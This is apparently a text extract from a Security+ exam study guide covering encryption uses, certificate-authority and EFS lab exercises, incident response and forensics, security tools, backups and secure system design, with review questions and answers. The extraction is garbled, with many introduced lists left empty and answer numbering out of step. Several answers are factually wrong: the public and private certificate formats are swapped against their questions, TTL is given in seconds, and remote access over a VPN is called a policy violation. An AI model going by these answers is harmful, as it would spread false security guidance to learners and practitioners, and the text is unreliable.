A company's data cannot be priced, and the disclosure of this data could cause grave danger to the company. If your competitors stole your secrets, they could beat you to the market and you would not get the rewards that you deserved. To prevent data from being accessed, we will encrypt the data to prevent it from being viewed and prevent any protocol analyzer from reading the packets. When people access the company's network from a remote location, they should use a L2TP/IPSec VPN tunnel, using AES, as the encryption to create a secure tunnel across the internet and to prevent man-in-the-middle attacks. Encryption could be coupled with mandatory access control to ensure that data is secure and kept confidential.

Supporting integrity

There are two main reasons for ensuring integrity. The first would be to hash data stored on a file server so that it can be proved whether or not that the data has been tampered with. This could also be the case for a forensic examination of a laptop seized by the police—the forensic scientist could hash the data before the examination and then re-hash it at the end to prove that he had not tampered with the data. The hash values should match.

Another method of proving integrity would be to digitally sign an email with your private key to prove to the recipient that it has not been tampered with in transit. Prior to this, you would have to send them your Public key to validate the email. This proves that the email has maintained its integrity and has not been tampered with in transit.

Supporting non-repudiation

When you digitally sign an email with your private key, you cannot deny that it was you as there is only one private key; this is known as non-repudiation. When two separate parties decide to do a business deal together, they may use a third party to create a digital contract, but parties would log in to where the contract was stored—once they digitally sign it, then it is legally binding.

Supporting obfuscation

When companies store their source code, they use obfuscation to make it obscure and so that it cannot be read by anyone who steals it. This is also known as security by obscurity, where you want to prevent third parties knowing about your IT systems and identifying any weaknesses in the system.

Low-power devices

Small IoT devices will need to use elliptic curve cryptography for encryption as it uses a small key—they do not have the power processing power for convention encryption.

Low latency

When using encryption, we should use symmetric ciphers such as 3DES or AES to encrypt large amounts of because they both use block cipher encryption with a small key length, compared to asymmetric keys, which have a minimum of 1,024 bits. The server will not have to use as much processing power, as the larger the key length, the more processing and possible latency that can occur. We should implement network accelerator cards where there is a lot of encryption and decryption.

High resiliency

We should be using the most secure encryption algorithm to prevent the encryption key from being cracked by attackers. The more secure the encryption key, the longer and more processing power it will take to gain the encryption key. In an RSA encryption environment, we should use a key with at least 3,072 bits or higher. We should also look at implementing accelerator cards to reduce the amount of latency on the encryption or decryption.

Supporting authentication

A corporate environment should not use a single-factor username and password as it is not as secure as a multifactor. We should adopt at least two-factor authentication and use a smart card and PIN to make authentication more secure. Installing a RADIUS server adds an additional layer to authentication to ensure that authentication from the endpoints is more secure.

Resource versus security constraints

The more secure the encryption used and the higher the key length, the more processing power and memory that the server will need. If there is not enough resources on the server, it could be vulnerable to a resource exhaustion attack, which causes the systems to hang or even crash—it is like a denial-of-service attack. We must strike a balance between the hardware resources that the server has and the amount of processing power.

Practical exercises

For these three practical exercises, you need a 2012/2016 server that is a domain controller. If you are a home user and have access to a desktop with Windows 7, Windows 8.1, or Windows 10 and do not have a server, you can still complete the second exercise.

Practical exercise 1 – building a certificate server

  1. Log in to your 2012/2016 domain controller and Open Server Manager.

  2. Select Manage, then Add Roles and Features; click next three times.

  3. On the select Server Roles page, check the top box, active directory certificate server. Select the Add Features button. Click next three times. Check the CA, box, then next, and then install. This will take a few minutes; when it is finished, press close.

  4. On the Server Manager toolbar, double-click on the yellow triangle; this is a notification. In the post-deployment configuration wizard, double-click on the blue hyperlink, and clock Configure active directory certificate service. Click next, then in the role services wizard, check the CA box. You need to wait a few seconds, then the next button comes alive. Press next twice. In the CA Type wizard, select Root CA and click Next three times. For the CA name under common name for this CA, enter the name MyCA, click next three times, then click Configure. After it is configured, press close.

  5. On the server manager toolbar press Tools, then CA. Expand MyCA on the left-hand side, then expand issued certificates, and it should be blank, as no certificates have been issued. See the following screenshot:


Figure 12: Certificate authority

Practical exercise 2—encrypting data with EFS and steal certificates

Follow these steps:

  1. Go to the desktop; create a folder called test.

  2. Inside the folder, create a text document called data.

  3. Right-click the folder called data, then select Properties.

  4. On the General tab, click Advanced, then check the box against encrypt content to secure data. The data folder should turn green; that means it is encrypted with EFS.

  5. Go to the Start button, then type mmc and select the icon with the red suitcase.

  6. Console 1 should open. Select File—Add remove snap in, then select certificates, select add, click next, and then finish.

  7. Expand certificates—current user, expand personal. You should see an entry for an EFS certificate.

  8. Right-click the Certificate. Select All tasks—export.

  9. The certification export wizard appears. Press Next. On the Export Private Key, select Yes, export the private key, press Next. You will see it is the P12 format, Press Next, check the password box, enter the password 123 twice, and then press next. In the file to export, call it PrivKey and save it to the desktop. Press next and then finish.

  10. The export was successful box should appear.

  11. Repeat the exercise and export the public key as PubKey.

  12. You should notice the two files on the desktop; the public key has a .cer extension and looks like a certificate. The private has a .pfx extension and looks like a letter being inserted into an envelope.

Practical exercise 3 – revoking the EFS certificate

  1. Go to Server Manager—Tools and select Certificate Authority.

  2. Expand issued certificates and then you should now see an EFS certificate.

  3. Right-click the Certificate and select All Tasks.

  4. Revoke the Certificate.

You will now notice it has moved from issued certificates to revoked certificates.

Review questions

  1. What type of certificate does CA have?

  2. If I am going to use a CA internally, what type of CA should I use?

  3. If I want to carry out b2b activity with third-party companies or sell products on the web, what type of CA should I use?

  4. Why would I make my CA offline when not in use?

  5. Who builds the CA or intermediary authorities?

  6. Who signs the X509 certificates?

  7. What can I use to prevent my CA being compromised and fraudulent certificates being issued?

  8. If two entities want to set up a cross certification, what must they set up first?

  9. What type of trust model does PGP use?

  10. How can I tell if my certificate is valid?

  11. If the CRL is going slow, what should I implement?

  12. Explain certificate stapling/OCSP stapling?

  13. What is the process of obtaining a new certificate?

  14. What is the purpose of the key escrow?

  15. What is the purpose of the HSM?

  16. What is the purpose of the DRA and what does it need to complete its role effectively?

  17. How can I identify each certificate?

  18. What type of file extension and format is a private certificate?

  19. What type of file extension and format is a public certificate?

  20. What format is a PEM certificate?

  21. What type of certificate can be used on multiple servers in the same domain?

  22. What type of certificate can be used on multiple domains?

  23. What should I do with my software to verify that is it original and not a fake copy?

  24. What is the purpose of extended validation of a X509?

  25. What type of cipher is the Caesar cipher and how does it work if it uses ROT 4?

  26. What is encryption and what are the inputs and outputs called?

  27. What type of encryption will be used to encrypt large amounts of data?

  28. What is the purpose of Diffie Hellman?

  29. What is the first stage in any encryption, no matter if it is asymmetric or symmetric?

  30. If Carol is encrypting data to send to Bob, what key will they each use?

  31. If George encrypted data four years ago with an old CAC card, can he un-encrypt the data with his new CAC card?

  32. If Janet is digitally signing an email to send to John to prove that it has not been tampered with in transit, what key will they each use?

  33. What two things does digitally signing an email provide?

  34. What asymmetric encryption algorithm should I use to encrypt data on a smartphone?

  35. What shall I use to encrypt a military mobile telephone?

  36. Name two key stretching algorithms.

  37. What is the purpose of key stretching?

  38. What is the difference between stream and block cipher modes, and which one will you use to encrypt large blocks of data?

  39. What happens with cipher block chaining if I don't have all of the blocks?

  40. If I want to ensure the integrity of data, what shall I use? Name two algorithms.

  41. If I want to ensure the protection of data, what shall I use?

  42. Is a hash a one-way or two-way function, is it reversible?

  43. What type of man-in-the-middle attack is SSL 3.0 (CBC) vulnerable to?

  44. Explain why we would use Diffie Hellman Ephemeral (DHE) and Elliptic Curve Diffie Hellman Ephemeral (ECDHE).

  45. What are the strongest and weakest methods of encryption with a L2TP/IPSec VPN tunnel?

  46. What is the name of the key used to ensure the security of communications between a computer and a server or a computer to another computer?

  47. What should I do to protect data-at-rest on a laptop?

  48. What should I do to protect data-at-rest on a tablet or smartphone?

  49. What should I do to protect data-at-rest on a backend server?

  50. What should I do to protect data-at-rest on a removable device such as a USB flash drive or an external hard drive?

  51. What two protocols could we use to protect data-in-transit?

  52. How can you protect data-in-use?

  53. What is the purpose of obfuscation?

  54. What is the purpose of perfect forward secrecy?

  55. What type of attack tries to find two has values that match?

  56. What is the purpose of rainbow tables?

  57. Explain the concept of steganography.

  58. What are the two purposes of data loss protection?

  59. What is the purpose of salting a password?

Answers and explanations

  1. A CA has a root certificate that he uses to sign keys.

  2. I would use a private CA for internal use only; these certificates will not be accepted outside of your organization.

  3. I would use a public CA for b2b activities.

  4. If you were a military, security, or banking organization, you would keep the CA offline when it is not being used to prevent it being compromised.

  5. An architect would build the CA or intermediary authorities.

  6. The CA would sign the X509 certificates.

  7. Certificate pinning can be used to prevent a CA being compromised and fraudulent certificates being issued.

  8. If two separate PKI entities want to set up a cross certification, the Root CAs would set up a trust model between themselves, known as a bridge trust model.

  9. PGP uses a trust model known as a Web of Trust.

  10. A Certificate Revocation List (CRL) is used to determine if a certificate is valid.

  11. If the CRL is going slow, an OCSP is used as it provides faster validation.

  12. Certificate stapling/OCSP stapling is where a web server uses an OCSP to for faster certificate authentication, bypassing the CRL.

  13. A Certificate Signing Request (CSR) generates two keys; the Public key is sent to the CA and then sends back the X509.

  14. The key escrow stores and manages private keys for third parties.

  15. A hardware security module is used by the key escrow as it securely stores and manages certificates.

  16. When a user's private key goes corrupt, the data recovery agent recovers the data by obtaining a copy of the private key from the key escrow.

  17. Each certificate can be identified by its OID, which is similar for each certificate.

  18. A public certificate is in a P7B format with a .cer extension.

  19. A private certificate is in a P12 format with a .pfx extension.

  20. A PEM certificate is in a Base64 format.

  21. A wildcard certificate can be used on multiple servers in the same domain.

  22. A Subject Alternative Name (SAN) certificate can be used on multiple domains.

  23. Code signing software is similar to hashing the software and ensuring the integrity of the software.

  24. Extended validation is normally used by financial institutions as it provides a higher level of trust for the X509; when it is used the URL background turns green.

  1. The Caesar cipher is a substitution cipher; an example would be ROT 4 where each letter would be substituted by a letter four characters further along in the alphabet.

  2. Encryption is when plaintext is taken and turned into ciphertext.

  3. Symmetric encryption is used to encrypt large amounts of data as it uses one key.

  4. Diffie Hellman is an asymmetric technique that creates a secure tunnel; during a VPN connection, it is used during the IKE phase and uses UDP Port 500 to create the VPN tunnel.

  5. The first stage in encryption is key exchange. During asymmetric encryption each entity will give the other entity their Public Key. The private key is secured and never given away.

  6. Carol uses Bob's Public Key to encrypt the data and then Bob will use his private key to decrypt the data. Encryption and decryption are always done by the same key pair.

  7. George must obtain the old private key to decrypt the data as the encryption was done with a different key pair.

  8. Janet will digitally sign the email with her private key and John will check its validity with Janet's Public key, which he would have received in advance.

  9. A digital signature provides both integrity and non-repudiation.

  10. Elliptic Curve Cryptography will be used to encrypt data on a smartphone as it is small and fast and uses the Diffie Hellman handshake.

  11. AES-256 will be used to encrypt a military mobile telephone.

  12. Two key-stretching algorithms are Bcrypt and PBKDF2.

  13. Key stretching salts the password being stored so that duplicates passwords are never stored and it increases the length of the keys to make it harder for a brute force attack.

  14. Stream encrypts one bit at a time and block cipher takes blocks of data, for example 128-bit modes. A block cipher will be used for large amount of data.

  15. Cipher Block Chaining needs all of the clocks of data to decrypt the data, otherwise it will not work.

  16. Hashing ensures the integrity of data; two examples are SHA-1 (160 bit) and MD5 (128 bit).

  17. Encryption is used to protect data so that it cannot be reviewed or accessed.

  18. A hash is one-way and cannot be reversed.

  19. POODLE is a man-in-the-middle attack on a downgraded SSL 3.0 (CBC).

  1. DHE and ECDHE are both ephemeral keys that are short-lived, one-time keys.

  2. The strongest encryption for a L2TP/IPSec VPN tunnel is AES and the weakest is DES.

  3. A session key ensures the security of communications between a computer and a server or computer to another computer.

  4. Data-at-rest on a laptop is protected by FDE.

  5. Data-at-rest on a tablet or smartphone are both protected by Full Device Encryption.

  6. Data-at-rest on a backend server is stored on a database, therefore it needs database encryption.

  7. Data-at-rest on a USB flash drive or external hard drive is done via Full Disk Encryption.

  8. Data-in-transit could be secured by using TLS, HTTPS, or a L2TP/IPsec tunnel.

  9. Data-in-use could be protected by Full Memory Encryption.

  10. Obfuscation is used to make source code look obscure so that if it is stolen it cannot be understood.

  11. Perfect forward secrecy ensures that there is no link between the server's private key and the session key. If the VPN server's key was compromised, it could not decrypt the session.

  12. A collision attack tries to match two hash values to obtain a password.

  13. Rainbow tables are a list of precomputed words showing their hash value. You will get rainbow tables for MD5 and different rainbow tables for SHA-1.

  14. Steganography is used to conceal data; you can hide a file—image, video, or audio—inside another image, video, or audio file.

  15. DLP prevents sensitive or PII information being emailed out of a company or being stolen form a file server using a USB device.

  16. Salting a password ensures that duplicate passwords are never stored and makes it more difficult for brute force attacks by increasing the key size (key stretching).

Responding to Security Incidents

In this chapter, we will be looking at incident response, particularly with regard to the collection of volatile evidence for forensic analysis.

We will cover the following exam objectives in this chapter:

Incident response procedures

There are many different incidents, and each of them requires a different incident response plan. For example, dealing with a flood or the failure of a server's hardware is totally different. The first stage of an incident response plan is to collect any volatile evidence so that the source of that incident can be identified, followed by containment of the incident itself, followed by the recovery procedures. Let's look in more detail at the components required to make incident response successful:

Incident response process

While responding to an incident, the following processes are followed:


Figure 1: Incident response process

Exam tip: 
Lessons learned is a detective control where the incident is reviewed and changes are made to prevent it happening again.

Understanding the basic concepts of forensics

Forensics is used by the police when they are investigating crimes and need to find as much evidence as they can to secure a conviction. We will be looking at computer and web-based attacks. There are many different components, therefore we will look at each of these in turn:

Exam tip: 
Order of volatility is collecting the most perishable evidence first.

Five minute practical

Open up the command prompt on your computer, and type netstat -an. You should now see the listening and established ports; count them, and write the numbers down. Run the command shutdown /r /t 0 to immediately reboot the machine. Log back in, go to the command prompt, and run netstat -an; what is the difference? You will see that you have lost information that could have been used as evidence:

Volatile evidence summary

Web-based attack

Computer attack

Removable drive

Command line

Capture network traffic

CPU cache then

RAM

Volatile memory using RAM

Netstat-an

Exam tip: 
Capturing the network traffic is the first step in remote or web-based attacks so that you can identify the course.

Date

From

To

Evidence

1st August

Sgt Smith

Sgt Jones

15 kg cocaine

2nd August

Sgt Jones

Property room

14 kg cocaine

Exam tip: 
Chain of custody must show who has handled the evidence until it is presented to the courts. The evidence must not leave the possession of the person who has signed for it, otherwise it needs to be investigated.

Example: Dr. Death has been prescribing new drugs to patients in a large hospital who have been dying. An auditor has been sent to investigate the possibility of foul play, and then following the audit, the FBI are notified. The doctor has been emailing a pharmaceutical company that has been supplying the drugs for a trial. The FBI does not want the doctor to be alerted, so they have the hospital's IT Team put his mailbox on legal hold. When the mailbox is on legal hold, the mailbox limit is lifted; the doctor can still send and receive email, but cannot delete anything. This way, he is not alerted to the fact that he is under investigation.

Exam tip: 
Recording the time offset is used for time normalization across multiple time zones.

Example: The police in three separate countries are trying to identify where the data started from in a chain, then who handled the data along the line. They have the following information of when it was first created:

New York: Created 3 a.m

Without recording the time offset, it looks as if it started off in New York, but if we apply regional times, when it is 4 a.m. in London, the time in New York is 11 p.m. the day before, so it cannot be New York. When it is 4.30 a.m. in Berlin, it is only 3.30 a.m. in London, therefore, it originated in Berlin. However, with the record time offset, it looked the least unlikely before the time offset was applied.

Exam tip: 
Taking a system image or a forensic copy of a hard drive is the first stage in forensic investigation.

Exam tip:
Hashing data before and after investigation can prove data integrity.

Example: Your company uses an account lockout of three attempts. If an attacker tries to log in once to three separate computers, each computer would not identify it as an attack, as it is a single attempt on each computer, but a SIEM system would pick up these attempts as three failed login attempts and alert the administrators in real time.

Exam tip:
Re-imaging computers and restoring data is part of the recovery phase.

Software tools to assess the security posture of an organization

Security teams are constantly under attack from cyber criminals and threat actors, and therefore they need to be able to use a mixture of different security tools so that they can identify attacks before they have a chance to cause grave damage to the business. We will now look at each of these tools to see the benefits of each:

Example: Someone within the company is not working as they should be but has been surfing the web, and the manager has called you in as the security administrator to gather evidence. You decide that a protocol analyzer or packet sniffer is the best tool to track the information. You run a Wireshark session and capture the visits to the NFL website. When you analyze the trace, you notice that the request is using the HTTP GET verb. This is the request for a page on www.nfl.com. When we drill down further into the analysis of the request, we are looking at a page with an article, Josh Hobbs and Mike Glennon drawing trade interest, as shown here:


Figure 2: Protocol analyzer

Exam tip: A protocol analyzer can detect the operating system of a host and commands being sent across the network to any applications.


Figure 3: Network scanner

Exam tip:A network mapper can identify the operating systems and services running on a computer.

The vulnerability scanner is passive and does not cause damage to the systems. An example is Microsoft Baseline Analyzer—see the following screenshot. Although the computer was fully patched, as it was a credentialed scan, it gave me some information:


Figure 4: Credentialed vulnerability scan

Exam tip:A credentialed vulnerability scanner can audit files and examine permissions.

Exam tip:A compliance scanner can ensure that all of the settings on computers are compliant and as they should be.

Backup utilities

Backing up data is very important so that if the systems fail, then a copy of the data can be obtained from a previous backup. A company cannot put a cost on its most critical data, and if it was to lose it, this would cause grave damage to the company, especially if the data was the Financial, or Research and Development Department, which make new prototypes of products.

There are various ways that we can back up the data—we can take snapshots of virtual machines, back up to a network, back up to tape, or a removable device. Let's look at these in turn.

Exam tip:A honeypot can be used to track the attack methods being used against websites.

Backup types

There are various types of backups and these are full, incremental, and differential. Let's look at these in turn:

Example: We will compare the different types of backup. We will start the backup each day, but will suffer data loss on the Friday, and we will see how many tapes we need to recover our data. Our full backup will be 50 GB of data and each day we will produce 5 GB of data. You can see this from the following chart, how many tapes are needed for each type of backups to recover your data:

Full: The latest full backup is 65 GB; each day we back up more and more

Backup

Mon

Tues

Wed

Thurs

Fri

Tapes to recover

Full (F)

F 50 GB

F 55 GB

F 60 GB

F 65 GB

X

F 65 GB thurs

Incremental (I)

F 50 GB

I 5 GB

I 5 GB

I 5 GB

X

F 50 GB Mon

3 X I—tues, wed, thurs

Differential (D)

F 50 GB

D 5 GB

D 10 GB

D 15 GB

X

F 50 GB mon

D 15 GB thurs

Exam tip:Symptoms of steganography is that an image is lighter or a file is larger than it should be.

Command-line tools

Command-line tools are used each day by security professionals, therefore, for the Security + exam, you must be familiar with these, and so I have provided a screenshot for many of these. We are going to see when we would use each of these in turn:


Figure 5: Ping


Figure 6: Continuous ping


Figure 7: Netstat


Figure 8: Tracert

Exam tip:Netstat shows the established and listening port, but if you reboot the computer, the established connections disappear.


Figure 9: Nslookup


Figure 10: Dig


Figure 11: ARP

The ipconfig /displaydns command is run in the following screenshot, and it shows the DNS cache on a computer:


Figure 12: DNS cache

Ipconfig /flushdns is used to clear out all entries in the DNS cache—see the following screenshot:


Figure 13: Clear DNS cache

tcpdump -i eth0 shows information on the first ethernet adapter, as shown in the following screenshot:


Figure 14: tcpdump


Figure 15: Netcat

Analyzing and interpreting output from security technologies

There are various applications that security administrators can use to analyze and stop various attacks. Let's look at these here:


Figure 16: HIDS output


Figure 17: Quarantined viruses

The following screenshot shows a scan for sensitive documents held on a desktop, and you can see that 135 documents have been found. We may need to install Data Loss Prevention (DLP) to protect these:


Figure 18: Sensitive documents scan


Figure 19: System file checker


Figure 20: Host-based firewall


Figure 21: Application whitelisting


Figure 22: Removable media policies

Exam tip:Applications must be added to the whitelist so that they can be approved to be used.


Figure 23: Sophos UTM 9


Example: We wish to set up a template to prevent Visa, Mastercard, Diners Club, JCB, Discover, and American Express details from being emailed out. This is done by creating a template that consists of a regular expression. Should the pattern be matched, the email will be blocked and an administrator will be notified. The regular expression is shown here:


Figure 24: Regular expression for credit cards


Figure 25: Data execution prevention


Figure 26: WAF log file

Review questions

  1. What is the purpose of an incident response plan?

  2. Name three different categories of incidents.

  3. Name three different types of roles required to deal with an incident.

  4. What should the Help Desk do when an incident has just been reported?

  5. What is the purpose of an incident response exercise?

  6. What is the first phase of the incident response process and what happens there?

  7. What is the last phase of the incident response process?

  8. What would happen if the last process of the incident response process is not carried out?

  9. What is order of volatility?

  10. What is the first action I should take if your company has a web-based or remote attack?

  11. What should I do if I find a USB flash drive in one of the servers?

  12. What is the process of chain of custody and why would you investigate it?

  13. What is the purpose of legal hold?

  14. What is the purpose of record time offset and what purpose does it provide?

  15. What is the first stage a forensics officer should carry out when he has just taken possession of a laptop computer?

  1. What is the first stage a forensics officer should carry out when he has just taken possession of a hard drive or removable drive?

  2. Why would a forensics officer take hashes of data before he starts his investigation?

  3. What are the benefits of a security administrator using a SIEM system?

  4. Can I delete data that I have copies of on a WORM drive?

  5. Why would we carry out active monitoring?

  6. What tools can I use to find the operating system running on a computer?

  7. If I am using an unencrypted media package that runs across my network, how can I capture the passwords?

  8. If I want to find information about the operating system of a remote web server, what is the best tool to use?

  9. What is the purpose of a network mapper?

  10. If I have disabled the SSID on my wireless access point, can someone still find the SSID?

  11. What type of vulnerability scanner can audit files and find out account vulnerabilities?

  12. What is the most basic vulnerability scanner that can only find missing patches?

  13. What tools can I use to ensure that the settings on my server are correct?

  14. What is the purpose of using the technique of steganography?

  15. How can I find the attack method a hacker would use to exploit my website?

  16. What is the quickest form of backup?

  17. What is the quickest form of tape backup?

  18. What are the most common types of backup? Name two.

  19. How many tapes would I need to recover my data if I use a differential backup?

  20. What would happen to command line troubleshooting tools if I block incoming ICMP on the network firewall?

  21. What tool is used to test connectivity and what command would you use to make it continuous?

  22. What is normally the maximum value of a packets TTL?

  23. What does the command-line tool netstat -an provide and what would happen if I rebooted the computer?

  24. What tool can I use in a Windows environment to verify the hostname entry in the DNS server?

  25. What are the commands to display the DNS cache and then clear all entries from it?

  1. What command-line tool displays the route to a remote web server?

  2. What is a packet tracing tool used in a Linux/Unix environment?

  3. What is the command-line tool to show the session between two hosts in a Linux/Unix environment?

  4. What is the purpose of a file integrity checker?

  5. If an application is neither on the blacklist or the whitelist, how can I ensure that I can install it on my computer?

  6. How could I prevent 4,000 people from installing USB flash drives on their computers?

  7. What tool is a firewall that can URL filter, content filter, and provide malware inspection?

  8. What tool can prevent PII and sensitive data from leaving your network via email or from being copied onto a USB flash drive.

  9. What is the tool that can prevent malicious programs from accessing the registry?

  10. What tool would you use to prevent an attack on a web-based application?



Answers and explanations

  1. An incident response plan is written for a particular incident and lays out how it should be tackled and the key personnel required.

  2. The different categories of incidents are as follows:

  3. The different roles required to deal with an incident are as follows:

  4. The help desk identifies the incident response plan required and the key personnel that need to be notified.

  5. An incident response exercise is to carry out the incident response plan and any shortfalls.

  6. The first phase of the incident response process is the preparation phase where the plan is already written in advance of any attack.

  7. The last phase of the incident response process is lessons learned where we review why the incident was successful.

  8. If we do not carry out lessons learned, the incident may re-occur. Lessons learned is a detective control where we try to identify and repair any weaknesses.

  9. Collecting the most volatile evidence first.

  10. The first action would be to capture the network traffic so that we can identify the source of the attack.

  11. You should collect the data in the volatile memory first.

  1. Chain of custody lists who has handled the evidence before it goes to court. Any break in the chain or the evidence leaving your site is a breach of the chain of custody and the judge would ask for it to be investigated.

  2. Legal Hold is a process to ensure the securing data so it cannot be deleted, for example putting someone's mailbox on hold. This is sometimes called litigation hold. 

  3. Record time offset is used for time normalization across multiple time zones.

  4. He should take a system image so that it can be used for investigation.

  5. He should take a forensic copy so that it can be used for investigation.

  6. To ensure that when he is finished that he can prove integrity of the data.

  7. A SIEM system can be used to correlate logs from multiple places and give real time reporting of incidents.

  8. Data cannot be deleted from a WORM drive, as it is write-once, read many.

  9. Active monitoring is used to identify an incident in real time.

  10. You can use a protocol analyzer to find the operating system running on a computer.

  11. You can use a protocol analyzer to capture the data and command going to a network-based application.

  12. Banner grabbing is the best tool to use if you want to find information about the operating system of a remote web server.

  13. A network mapper can identify all hosts on your network, their patch level, and any services running on them.

  14. You can use a wireless packet sniffer or a SSID de-cloak device to find the SSID of your WAP, as it is embedded in the network traffic going to the WPA.

  15. A credentialed vulnerability scanner can audit files and find out account vulnerabilities.

  16. A non-credentialed vulnerability scanner that can only find missing patches.

  17. A compliance scanner ensures that the settings on your server are correct.

  18. Steganography allows you to hide a file, an audio, video, or image inside another a file, audio, video, or image. You may notice a larger file or faded image.

  19. You would set up a honeypot to find the attack method a hacker would use to exploit your website.

  20. The quickest form of backup is a snapshot of a virtual machine.

  21. The quickest form of tape backup is a full backup, as all backups need a full backup to start with.

  22. The two most common tape backups are full and incremental.

  23. You will need two tapes to perform a differential backup.

  24. If incoming ICMP was blocked on the network firewall, none of your command-line tools would work as ICMP bring back the replies.

  25. Ping is the tool that is used to test connectivity and the command ping -t is used for continuous ping.

  26. The normal maximum value of a packets TTL is 128 seconds or less.

  27. Netstat -an shows listening and established ports. If you reboot your computer, the established sessions will disappear.

  28. DNS lookup is used in a Windows environment to verify the hostname entry in the DNS server. Dig is the Unix/Linux equivalent.

  29. Ipconfig /displaydns displays the DNS cache and Ipconfig /flush clears all entries.

  30. Tracert is used to display the route to a remote web server over a maximum of 30 hops.

  31. tcpdump is a packet tracer used in a Linux/Unix environment.

  32. Netcat or nc shows the session between two hosts in a Linux/Unix environment.

  33. A file integrity checker can determine whether a file has been altered by an application or is corrupt.

  34. If an application is neither on the blacklist or the whitelist, you need to add it to the whitelist so that you can install it on your computer.

  35. You can use group policy to prevent 4,000 people from installing USB flash drives on their computers.

  36. A UTM is a firewall that can URL filter, content filter, and provide malware inspection.

  37. DLP can prevent PII and sensitive data from leaving your network via email or from being copied onto a USB flash drive.

  38. DEP can prevent malicious programs from accessing the registry by restricting the area that programs can access.

  39. A web application firewall can prevent an attack on a web-based application.

Managing Business Continuity

In this chapter, we will be looking at our business environment to provide systems availability, selecting the most appropriate method for disaster recovery following a disaster. This will be broken down into four distinct sections, and you must understand each of them:

We will cover the following topics in this chapter: 

Implementing secure systems design

IT systems range from desktops and servers used internally to mobile devices, such as laptops that can also be used externally in unsecured environments, such as hotels and airports. We therefore need to harden the systems and operating systems so that they are as secure as we can possibly make them. There are various aspects that we need to look at, depending on the functionality of the device and where they are used. Let's look at all of the aspects that we need to take into consideration, and we will start with a system booting up:

Example: Your company is a multinational company that requires an operating system that can be used by both desktops and laptops that can provide both secure boot and attestation. Which operating system and feature will you choose and why? At the moment, we are using a BIOS to boot up from.

The first thing that we would do is upgrade the BIOS to UEFI so that it can provide a secure boot. The operating system selected would be Windows 10 as it provides a secure boot where the drivers need to be signed to allow boot up. We would then enable Device Guard, which logs the setting of the operating system and checks the integrity of the software and hardware, otherwise the boot sequence fails.

Hardware/firmware security

We need to protect our computer systems against someone stealing the data by stealing the device, re-installing the operating system, and stealing the data. We need to be able to secure the operating systems and hardware by encrypting them by using products such as Microsoft's Bitlocker. Let's look at some encryption methods:

Exam tip:FDE needs either a TPM chip on the motherboard or a HSM.

Operating systems

There are various operating systems, such as Linux, that are used by the cloud and many network appliances, and Microsoft has Windows 10 for desktops and laptops, and Server 29016 for servers. There is also Android for many phones, as well as Apples iOS for iPhones and iPads. Let's look at different uses of these:

Securing IT systems

It is important that we secure all of our IT systems against attacks. Let's now look at hardening the operating system to reduce the surface attack. Let's look at each of these in turn:

Exam tip:When receiving a new IT System or IoT device, you need to change the default administrator account and password.

Exam tip:When receiving a new IT system or IoT device, you need to change the default administrator account and password.

Peripherals

Once we have looked at the security of the IT systems, we need to look at the vulnerabilities of the peripherals to see where they are vulnerable:

Importance of secure staging deployment concepts

Before applications can be used in a production environment, we must ensure that they are as secure as possible to mitigate the risk of being attacked by an outside agency. We are going to look at three different aspects: sandboxing, environment, and secure baseline. Let's look at these in turn:


Figure 1: Environment

Troubleshooting common security issues

On a day-to-day basis, the security team will come across some of the following issues, and we will look at how they can mitigate the risk caused by each of them:


Figure 2: Trusted Root Certification Authorities

Exam tip:If a certificate does not work, ensure it is valid and add it to the Trusted Root Certification Authorities.

Misconfigured devices

It is vital that all network appliances are properly configured or the company could be vulnerable to attack. Let's look at some of the appliances for this:

Personnel issues

Most cybercrime is successful due to the actions of people that work for the company, and therefore we need to set up policies to mitigate against any attack. Let's look at some of the personnel security issues facing the security team:

Exam tip: Accessing the company network externally with a secure connection or VPN is policy violation.

Software issues

Software is no longer run locally, as some of it is now run or downloaded from the internet. Therefore, the security team needs to be aware of unauthorized software being installed on their IT systems. Let's look as some of the problems that are posed:

Exam tip:Someone downloading unauthorized software will increase the bandwidth and reduce the disk space.

Disaster recovery and continuity of operations concepts

It is important that if a company suffers from a disaster that they can be up and running as soon as possible. Disasters range from natural disasters such as hurricanes or floods, hardware failure, malicious insider attack, or accidental deletion of data. The main aim of a disaster recovery plan is to get the company back up and running so that it can generate income. Let's look at the different aspects of disaster recovery:

Exam tip:Cloud providers and multinational companies can only store data within the region that it was created in.

Exam tip:If we don't hold a post-incident meeting, then we will not prevent the incident from re-occurring. This is known as lessons learned.

Review questions

  1. What type of BIOS needs to be implemented if we want an operating system to be able to secure boot?

  2. When a Windows 10 operating systems secure boots, what checks does it carry out relating to drivers?

  3. What type of trust model is being used if we use Full Disk Encryption?

  4. If my laptop is going to use Full Disk Encryption, what type of chip do I need to have installed on the motherboard?

  5. Why would you need to vet your supply chain?

  6. Where does EMI come from and how can it affect your computer systems?

  7. What is the difference between EMI and EMP?

  8. What can a company install to reduce the threat of EMP?

  9. What is the purpose of a Kiosk?

  10. Describe a trusted operating system.

  1. Name two mobile operating systems and where they are used.

  2. When we receive a new IT system or IoT device, what is the first step we need to carry out?

  3. Why would you disable unnecessary ports and services?

  4. What is the purpose of using STIG?

  5. How can I protect an external storage device against data theft?

  6. What should I do to reduce the attack surface on a digital camera?

  7. What is the best way to test a bespoke application before moving it into production?

  8. What are the four stages when designing a new application?

  9. What is an example of access violation?

  10. If I purchase a new X509 certificate and it does not work, what two actions should I carry out?

  11. How can I tell if someone is stealing data using steganography?

  12. What can we do to prevent someone stealing PII or sensitive data?

  13. What is the most common authentication method that can be incorrectly configured?

  14. How can we prevent someone from stealing a laptop and a tablet?

  15. If a remote user is accessing the company's network externally and decides not to use a VPN, what is he guilty of?

  16. What information should I not post on social media, such as Twitter or Facebook?

  17. What are two symptoms that someone is downloading unauthorized software?

  18. Give an example of license compliance violation.

  19. What is the fastest site to implement during disaster recovery?

  20. If my company is a multinational corporation, can I store New York data in London, in case the New York site falls over?

  21. If my hot site is over 200 miles away, what should I consider to make recovery much faster?

  22. What is a theory-based or paper-based disaster recovery exercise?

  23. What is the purpose of an after-action report?

  24. What is the cheapest disaster recovery site but the slowest to get back up and running?

  25. What is the difference between geotracking and geotagging?


Answers and explanations

  1. You would implement the Unified Extensible Firmware Interface (UEFI) as it is more secure and has the ability to secure boot an operating system.

  2. When a Windows 10 operating system secure boots, it checks that all of the drivers are digitally signed.

  3. A hardware root of trust is used by FDE.

  4. Full Disk Encryption needs a TPM chip on the motherboard or a portable HSM.

  5. You need to vet people working for companies in your supply chain and also ensure that they are large enough to supply goods and services.

